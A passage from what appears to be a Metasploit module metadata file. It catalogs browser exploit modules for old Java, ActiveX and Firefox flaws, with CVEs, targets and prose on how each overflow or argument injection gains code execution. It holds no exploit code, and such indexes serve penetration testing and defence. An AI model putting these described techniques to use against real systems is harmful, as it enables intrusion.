A \"code\" parameter that is a URL that does not contain any dots\n\n the applet will run outside of the sandbox.\n\n This vulnerability affects JRE prior to version 6 update 24.", + "references": [ + "CVE-2010-4452", + "OSVDB-71193", + "ZDI-11-084", + "URL-http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/", + "URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html" + ], + "platform": "Java", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Generic (Java Payload)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_codebase_trust.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_codebase_trust", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_docbase_bof": { + "name": "Sun Java Runtime New Plugin docbase Buffer Overflow", + "fullname": "exploit/windows/browser/java_docbase_bof", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-10-12", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a flaw in the new plugin component of the Sun Java\n Runtime Environment before v6 Update 22. By specifying specific parameters\n to the new plugin, an attacker can cause a stack-based buffer overflow and\n execute arbitrary code.\n\n When the new plugin is invoked with a \"launchjnlp\" parameter, it will\n copy the contents of the \"docbase\" parameter to a stack-buffer using the\n \"sprintf\" function. 
A string of 396 bytes is enough to overflow the 256\n byte stack buffer and overwrite some local variables as well as the saved\n return address.\n\n NOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n Due to this, only characters which have a valid localized multibyte\n representation are allowed. Invalid characters will be replaced with\n question marks ('?').\n\n This vulnerability was originally discovered independently by both Stephen\n Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n been done, all versions since version 6 Update 10 are believed to be affected\n by this vulnerability.\n\n This vulnerability was patched as part of the October 2010 Oracle Patch\n release.", + "references": [ + "CVE-2010-3552", + "OSVDB-68873", + "BID-44023", + "URL-http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html", + "ZDI-10-206", + "URL-http://code.google.com/p/skylined/issues/detail?id=23", + "URL-http://web.archive.org/web/20130119152812/http://skypher.com:80/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/", + "URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal (msvcr71.dll ROP)" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/java_docbase_bof.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_docbase_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_mixer_sequencer": { + "name": "Java MixerSequencer Object GM_Song Structure Handling Vulnerability", + "fullname": "exploit/windows/browser/java_mixer_sequencer", + "aliases": [], + "rank": 500, + "disclosure_date": "2010-03-30", + "type": "exploit", + 
"author": [ + "Peter Vreugdenhil", + "juan vazquez " + ], + "description": "This module exploits a flaw within the handling of MixerSequencer objects\n in Java 6u18 and before.\n\n Exploitation id done by supplying a specially crafted MIDI file within an RMF\n File. When the MixerSequencer objects is used to play the file, the GM_Song\n structure is populated with a function pointer provided by a SONG block in the\n RMF. A Midi block that contains a MIDI with a specially crafted controller event\n is used to trigger the vulnerability.\n\n When triggering the vulnerability \"ebx\" points to a fake event in the MIDI file\n which stores the shellcode. A \"jmp ebx\" from msvcr71.dll is used to make the\n exploit reliable over java updates.", + "references": [ + "CVE-2010-0842", + "OSVDB-63493", + "BID-39077", + "ZDI-10-060", + "URL-http://web.archive.org/web/20210624004250/http://vreugdenhilresearch.nl/java-midi-parse-vulnerabilities/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows / Java 6 <=u18" + ], + "mod_time": "2025-02-28 09:35:28 +0000", + "path": "/modules/exploits/windows/browser/java_mixer_sequencer.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_mixer_sequencer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_ws_arginject_altjvm": { + "name": "Sun Java Web Start Plugin Command Line Argument Injection", + "fullname": "exploit/windows/browser/java_ws_arginject_altjvm", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-04-09", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a flaw in the Web Start plugin component of Sun Java\n Web Start. 
The arguments passed to Java Web Start are not properly validated.\n By passing the lesser known -J option, an attacker can pass arbitrary options\n directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed\n by Ruben Santamarta, an attacker can execute arbitrary code in the context of\n an unsuspecting browser user.\n\n This vulnerability was originally discovered independently by both Ruben\n Santamarta and Tavis Ormandy. Tavis reported that all versions since version\n 6 Update 10 \"are believed to be affected by this vulnerability.\"\n\n In order for this module to work, it must be ran as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.", + "references": [ + "CVE-2010-0886", + "CVE-2010-1423", + "OSVDB-63648", + "BID-39346", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2010-04/0122.html", + "URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=67&Itemid=1" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Java Runtime on Windows x86" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_ws_arginject_altjvm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_ws_double_quote": { + "name": "Sun Java Web Start Double Quote Injection", + "fullname": "exploit/windows/browser/java_ws_double_quote", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-10-16", + "type": "exploit", + "author": [ + "Rh0 " + ], + "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. 
Parameters initial-heap-size and max-heap-size in a JNLP\n file can contain a double quote which is not properly sanitized when creating\n the command line for javaw.exe. This allows the injection of the -XXaltjvm\n option to load a jvm.dll from a remote UNC path into the java process. Thus\n an attacker can execute arbitrary code in the context of a browser user.\n This flaw was fixed in Oct. 2012 and affects JRE <= 1.6.35 and <= 1.7.07.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB (In most cases, this means non-Windows hosts). Additionally,\n the target host must have the WebClient service (WebDAV Mini-Redirector) enabled.\n Alternatively, a UNC path containing a jvm.dll can be specified, bypassing\n the Windows limitation for the Metasploit host.", + "references": [ + "CVE-2012-1533", + "OSVDB-86348", + "BID-56046", + "URL-http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html", + "URL-http://pastebin.com/eUucVage " + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Java Runtime 1.6.31 to 1.6.35 and 1.7.03 to 1.7.07 on Windows x86" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_ws_double_quote.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_ws_double_quote", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/java_ws_vmargs": { + "name": "Sun Java Web Start Plugin Command Line Argument Injection", + "fullname": "exploit/windows/browser/java_ws_vmargs", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-02-14", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a flaw in the Web Start component of the Sun Java\n Runtime Environment. 
The arguments passed to Java Web Start are not properly\n validated, allowing injection of arbitrary arguments to the JVM.\n\n By utilizing the lesser known -J option, an attacker can take advantage of\n the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method\n allows an attacker to execute arbitrary code in the context of an unsuspecting\n browser user.\n\n In order for this module to work, it must be run as root on a server that\n does not serve SMB. Additionally, the target host must have the WebClient\n service (WebDAV Mini-Redirector) enabled.", + "references": [ + "CVE-2012-0500", + "OSVDB-79227", + "BID-52015", + "URL-https://seclists.org/fulldisclosure/2012/Feb/251", + "URL-http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Java Runtime on Windows x86" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/java_ws_vmargs.rb", + "is_install_path": true, + "ref_name": "windows/browser/java_ws_vmargs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/juniper_sslvpn_ive_setupdll": { + "name": "Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/juniper_sslvpn_ive_setupdll", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-04-26", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in the JuniperSetupDLL.dll\n library which is called by the JuniperSetup.ocx ActiveX\tcontrol,\n as part of the Juniper SSL-VPN (IVE) appliance. 
By specifying an\n overly long string to the ProductName object parameter, the stack\n is overwritten.", + "references": [ + "CVE-2006-2086", + "OSVDB-25001", + "BID-17712", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2006-04/0743.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP3 English", + "Debugging" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/juniper_sslvpn_ive_setupdll.rb", + "is_install_path": true, + "ref_name": "windows/browser/juniper_sslvpn_ive_setupdll", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/kazaa_altnet_heap": { + "name": "Kazaa Altnet Download Manager ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/kazaa_altnet_heap", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-10-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Altnet Download Manager ActiveX\n Control (amd4.dll) bundled with Kazaa Media Desktop 3.2.7.\n By sending an overly long string to the \"Install()\" method, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2007-5217", + "OSVDB-37785", + "URL-http://web.archive.org/web/20071014051150/http://secunia.com:80/advisories/26970" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP2 / IE 6.0SP1 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/kazaa_altnet_heap.rb", + "is_install_path": true, + "ref_name": "windows/browser/kazaa_altnet_heap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": null + }, + "exploit_windows/browser/keyhelp_launchtripane_exec": { + "name": "KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability", + "fullname": "exploit/windows/browser/keyhelp_launchtripane_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-06-26", + "type": "exploit", + "author": [ + "rgod ", + "juan vazquez " + ], + "description": "This module exploits a code execution vulnerability in the KeyScript ActiveX\n control from keyhelp.ocx. It is packaged in several products or GE, such as\n Proficy Historian 4.5, 4.0, 3.5, and 3.1, Proficy HMI/SCADA 5.1 and 5.0, Proficy\n Pulse 1.0, Proficy Batch Execution 5.6, and SI7 I/O Driver between 7.20 and 7.42.\n When the control is installed with these products, the function \"LaunchTriPane\"\n will use ShellExecute to launch \"hh.exe\", with user controlled data as parameters.\n Because of this, the \"-decompile\" option can be abused to write arbitrary files on\n the remote system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine, and then upload another mof file, which enables Windows Management\n Instrumentation service to execute it. Please note that this module currently only\n works for Windows before Vista.\n\n On the other hand, the target host must have the WebClient service (WebDAV\n Mini-Redirector) enabled. 
It is enabled and automatically started by default on\n Windows XP SP3", + "references": [ + "CVE-2012-2516", + "OSVDB-83311", + "BID-55265", + "ZDI-12-169", + "URL-http://support.ge-ip.com/support/index?page=kbchannel&id=S:KB14863" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/keyhelp_launchtripane_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/keyhelp_launchtripane_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/browser/logitechvideocall_start": { + "name": "Logitech VideoCall ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/logitechvideocall_start", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-05-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the Logitech VideoCall ActiveX\n Control (wcamxmp.dll 2.0.3470.448). 
By sending an overly long string to the\n \"Start()\" method, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-2918", + "OSVDB-36820", + "BID-24254" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/logitechvideocall_start.rb", + "is_install_path": true, + "ref_name": "windows/browser/logitechvideocall_start", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/lpviewer_url": { + "name": "iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/lpviewer_url", + "aliases": [], + "rank": 300, + "disclosure_date": "2008-10-06", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). 
When\n sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2008-4384", + "OSVDB-48946", + "US-CERT-VU-848873", + "BID-31604" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/lpviewer_url.rb", + "is_install_path": true, + "ref_name": "windows/browser/lpviewer_url", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/macrovision_downloadandexecute": { + "name": "Macrovision InstallShield Update Service Buffer Overflow", + "fullname": "exploit/windows/browser/macrovision_downloadandexecute", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-10-31", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Macrovision InstallShield Update\n Service(Isusweb.dll 6.0.100.54472). 
By passing an overly long ProductCode string to\n the DownloadAndExecute method, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-5660", + "OSVDB-38347" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0/SP1 Pro English", + "Windows 2000 Pro English All" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/macrovision_downloadandexecute.rb", + "is_install_path": true, + "ref_name": "windows/browser/macrovision_downloadandexecute", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/macrovision_unsafe": { + "name": "Macrovision InstallShield Update Service ActiveX Unsafe Method", + "fullname": "exploit/windows/browser/macrovision_unsafe", + "aliases": [], + "rank": 600, + "disclosure_date": "2007-10-20", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module allows attackers to execute code via an unsafe method in Macrovision InstallShield 2008.", + "references": [ + "CVE-2007-5660", + "OSVDB-38347", + "BID-26280" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/macrovision_unsafe.rb", + "is_install_path": true, + "ref_name": "windows/browser/macrovision_unsafe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/malwarebytes_update_exec": { + "name": "Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution", + "fullname": "exploit/windows/browser/malwarebytes_update_exec", + "aliases": [], + "rank": 400, + "disclosure_date": "2014-12-16", + 
"type": "exploit", + "author": [ + "Yonathan Klijnsma", + "Gabor Seljan", + "todb " + ], + "description": "This module exploits a vulnerability in the update functionality of\n Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n Anti-Exploit consumer 1.03.1.1220.\n Due to the lack of proper update package validation, a man-in-the-middle\n (MITM) attacker could execute arbitrary code by spoofing the update server\n data-cdn.mbamupdates.com and uploading an executable. This module has\n been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.", + "references": [ + "CVE-2014-4936", + "OSVDB-116050", + "URL-http://web.archive.org/web/20241212224255/http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2025-02-07 12:36:11 +0000", + "path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/malwarebytes_update_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/maxthon_history_xcs": { + "name": "Maxthon3 about:history XCS Trusted Zone Code Execution", + "fullname": "exploit/windows/browser/maxthon_history_xcs", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-11-26", + "type": "exploit", + "author": [ + "Roberto Suggi Liverani", + "sinn3r ", + "juan vazquez " + ], + "description": "Cross Context Scripting (XCS) is possible in the Maxthon about:history page.\n Injection in such privileged/trusted browser zone can be used to modify\n configuration settings and execute arbitrary commands.\n\n Please note this module only works against specific versions of XCS. 
Currently,\n we've only successfully tested on Maxthon 3.1.7 build 600 up to 3.2.2 build 1000.", + "references": [ + "OSVDB-88191", + "EDB-23225", + "URL-http://blog.malerisch.net/2012/12/maxthon-cross-context-scripting-xcs-about-history-rce.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Maxthon 3 (prior to 3.3) on Windows" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/maxthon_history_xcs.rb", + "is_install_path": true, + "ref_name": "windows/browser/maxthon_history_xcs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mcafee_mcsubmgr_vsprintf": { + "name": "McAfee Subscription Manager Stack Buffer Overflow", + "fullname": "exploit/windows/browser/mcafee_mcsubmgr_vsprintf", + "aliases": [], + "rank": 300, + "disclosure_date": "2006-08-01", + "type": "exploit", + "author": [ + "skape " + ], + "description": "This module exploits a flaw in the McAfee Subscription Manager ActiveX control.\n Due to an unsafe use of vsprintf, it is possible to trigger a stack buffer overflow by\n passing a large string to one of the COM-exposed routines, such as IsAppExpired.\n This vulnerability was discovered by Karl Lynn of eEye.", + "references": [ + "CVE-2006-3961", + "OSVDB-27698", + "BID-19265" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP0/SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb", + "is_install_path": true, + "ref_name": "windows/browser/mcafee_mcsubmgr_vsprintf", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/browser/mcafee_mvt_exec": { + "name": "McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability", + "fullname": "exploit/windows/browser/mcafee_mvt_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-04-30", + "type": "exploit", + "author": [ + "rgod", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in McAfee Virtual Technician's\n MVTControl. This ActiveX control can be abused by using the GetObject() function\n to load additional unsafe classes such as WScript.Shell, therefore allowing remote\n code execution under the context of the user.", + "references": [ + "CVE-2012-4598", + "OSVDB-81657", + "EDB-18805", + "URL-https://kc.mcafee.com/corporate/index?page=content&id=SB10028" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mcafee_mvt_exec.rb", + "is_install_path": true, + "ref_name": "windows/browser/mcafee_mvt_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mcafeevisualtrace_tracetarget": { + "name": "McAfee Visual Trace ActiveX Control Buffer Overflow", + "fullname": "exploit/windows/browser/mcafeevisualtrace_tracetarget", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-07-07", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the McAfee Visual Trace 3.25 ActiveX\n Control (NeoTraceExplorer.dll 1.0.0.1). 
By sending an overly long string to the\n \"TraceTarget()\" method, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2006-6707", + "OSVDB-32399", + "URL-http://web.archive.org/web/20061223042405/http://secunia.com:80/advisories/23463/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP2 English" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb", + "is_install_path": true, + "ref_name": "windows/browser/mcafeevisualtrace_tracetarget", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mirc_irc_url": { + "name": "mIRC IRC URL Buffer Overflow", + "fullname": "exploit/windows/browser/mirc_irc_url", + "aliases": [], + "rank": 300, + "disclosure_date": "2003-10-13", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in mIRC 6.1. 
By\n submitting an overly long and specially crafted URL to\n the 'irc' protocol, an attacker can overwrite the buffer\n and control program execution.", + "references": [ + "CVE-2003-1336", + "OSVDB-2665", + "BID-8819" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro English All", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mirc_irc_url.rb", + "is_install_path": true, + "ref_name": "windows/browser/mirc_irc_url", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_attribchildremoved": { + "name": "Firefox 8/9 AttributeChildRemoved() Use-After-Free", + "fullname": "exploit/windows/browser/mozilla_attribchildremoved", + "aliases": [], + "rank": 200, + "disclosure_date": "2011-12-06", + "type": "exploit", + "author": [ + "regenrecht", + "Lincoln ", + "corelanc0d3r " + ], + "description": "This module exploits a use-after-free vulnerability in Firefox 8/8.0.1 and 9/9.0.1.\n Removal of child nodes from the nsDOMAttribute can allow for a child\n to still be accessible after removal due to a premature notification\n of AttributeChildRemoved. Since mFirstChild is not set to NULL until\n after this call is made, this means the removed child will be accessible\n after it has been removed. 
By carefully manipulating the memory layout,\n this can lead to arbitrary code execution.", + "references": [ + "CVE-2011-3659", + "OSVDB-78736", + "ZDI-12-110", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=708198" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP - Firefox 8 / 8.0.1", + "Windows XP - Firefox 9", + "Windows XP - Firefox 9.0.1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_attribchildremoved.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_attribchildremoved", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_firefox_onreadystatechange": { + "name": "Firefox onreadystatechange Event DocumentViewerImpl Use After Free", + "fullname": "exploit/windows/browser/mozilla_firefox_onreadystatechange", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-06-25", + "type": "exploit", + "author": [ + "Nils", + "Unknown", + "w3bd3vil", + "sinn3r ", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found on Firefox 17.0.6, specifically a use\n after free of a DocumentViewerImpl object, triggered via a specially crafted web\n page using onreadystatechange events and the window.stop() API, as exploited in the\n wild on 2013 August to target Tor Browser users.", + "references": [ + "CVE-2013-1690", + "OSVDB-94584", + "BID-60778", + "URL-https://www.mozilla.org/security/announce/2013/mfsa2013-53.html", + "URL-https://lists.torproject.org/pipermail/tor-announce/2013-August/000089.html", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=901365", + "URL-http://krash.in/ffn0day.txt", + "URL-http://hg.mozilla.org/releases/mozilla-esr17/rev/2d5a85d7d3ae" + ], + "platform": "Windows", + "arch": "", + "rport": null, + 
"autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Firefox 17 & Firefox 21 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_firefox_onreadystatechange.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_firefox_onreadystatechange", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_firefox_xmlserializer": { + "name": "Firefox XMLSerializer Use After Free", + "fullname": "exploit/windows/browser/mozilla_firefox_xmlserializer", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-08", + "type": "exploit", + "author": [ + "regenrecht", + "juan vazquez " + ], + "description": "This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically\n a use-after-free of an Element object, when using the serializeToStream method\n with a specially crafted OutputStream defining its own write function. 
This module\n has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP\n SP3.", + "references": [ + "CVE-2013-0753", + "OSVDB-89021", + "BID-57209", + "ZDI-13-006", + "URL-http://www.mozilla.org/security/announce/2013/mfsa2013-16.html", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=814001" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Firefox 17 / Windows XP SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_firefox_xmlserializer.rb", + "is_install_path": true, + "ref_name": "windows/browser/mozilla_firefox_xmlserializer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/browser/mozilla_interleaved_write": { + "name": "Mozilla Firefox Interleaved document.write/appendChild Memory Corruption", + "fullname": "exploit/windows/browser/mozilla_interleaved_write", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-10-25", + "type": "exploit", + "author": [ + "unknown", + "scriptjunkie" + ], + "description": "This module exploits a code execution vulnerability in Mozilla\n Firefox caused by interleaved calls to document.write and appendChild.\n This module was written based on a live exploit found in the wild.", + "references": [ + "CVE-2010-3765", + "OSVDB-68905", + "BID-15352", + "EDB-15352", + "URL-https://bugzilla.mozilla.org/show_bug.cgi?id=607222", + "URL-http://www.mozilla.org/security/announce/2010/mfsa2010-73.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/browser/mozilla_interleaved_write.rb", + "is_install_path": true, + "ref_name": 
